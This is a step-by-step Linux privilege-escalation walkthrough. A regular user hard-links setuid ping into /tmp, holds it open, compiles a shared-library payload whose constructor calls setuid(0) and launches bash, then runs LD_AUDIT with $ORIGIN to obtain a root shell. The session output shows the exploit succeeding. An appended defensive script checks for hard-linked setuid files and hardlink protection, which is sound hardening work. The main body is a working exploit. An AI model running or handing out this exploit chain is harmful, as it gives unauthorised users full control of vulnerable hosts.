First, create a regular user and set a password for it, so that you can log in as that user with the su command.

[root@icsoc ~]# useradd test

[root@icsoc ~]# passwd test

New password: 

Retype new password:

passwd: all authentication tokens updated successfully.

[root@icsoc ~]# su - test

[test@icsoc ~]$ whoami 

test                            // logged in as the regular user; it cannot create other users

[test@icsoc ~]$ useradd aaa

-bash: /usr/sbin/useradd: Permission denied

Next, switch identity:

[test@icsoc ~]$ mkdir /tmp/exploit

[test@icsoc ~]$ ln /bin/ping /tmp/exploit/target

[test@icsoc exploit]$  exec 3< /tmp/exploit/target

[test@icsoc exploit]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target

[test@icsoc exploit]$ rm -rf /tmp/exploit/

[test@icsoc exploit]$ ls -l /proc/$$/fd/3

[test@icsoc ~]$ vim payload.c 

void __attribute__((constructor)) init()     // put the following content in the file

{

    setuid(0);

    system("/bin/bash");

}

~           

[test@icsoc ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

[test@icsoc ~]$ ls -l /tmp/exploit

[test@icsoc ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]

            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]

            [-M mtu discovery hint] [-S sndbuf]

            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

[root@icsoc ~]# whoami 

root

The identity has changed to the root user. The identity switch succeeded!
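
A defensive check for the hard-link step shown above, as an added example that is not part of the original post: it lists setuid/setgid files that have more than one hard link under the directories you pass in, and reports whether the kernel's fs.protected_hardlinks restriction is on. The function names are made up for this example, and it assumes /bin/ping is setuid root on the affected host, which the session implies but does not show.

```shell
#!/bin/sh
# Added defensive example (not from the original post).
# Function names are hypothetical; directories to scan are given by the caller.

# List setuid/setgid regular files under DIR that have more than one hard
# link. A second name for such a file inside a user-writable directory is
# what `ln /bin/ping /tmp/exploit/target` creates.
find_linked_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -links +1 -print 2>/dev/null
}

# Report whether the kernel refuses hard links to files the caller does not
# own (fs.protected_hardlinks=1). The path is a parameter so it can be tested.
hardlink_protection() {
    f=${1:-/proc/sys/fs/protected_hardlinks}
    if [ -r "$f" ] && [ "$(cat "$f")" = "1" ]; then
        echo enabled
    else
        echo disabled-or-unsupported
    fi
}

# Run the audit only when directories are given, e.g.:
#   sh audit.sh /tmp /var/tmp /home
if [ "$#" -gt 0 ]; then
    echo "fs.protected_hardlinks: $(hardlink_protection)"
    for dir in "$@"; do
        find_linked_setid "$dir" | while IFS= read -r path; do
            echo "setuid/setgid file with extra hard link: $path"
        done
    done
fi
```

Where fs.protected_hardlinks reports disabled-or-unsupported, keeping user-writable directories such as /tmp on a separate filesystem from setuid binaries also blocks the link, since hard links cannot cross filesystems.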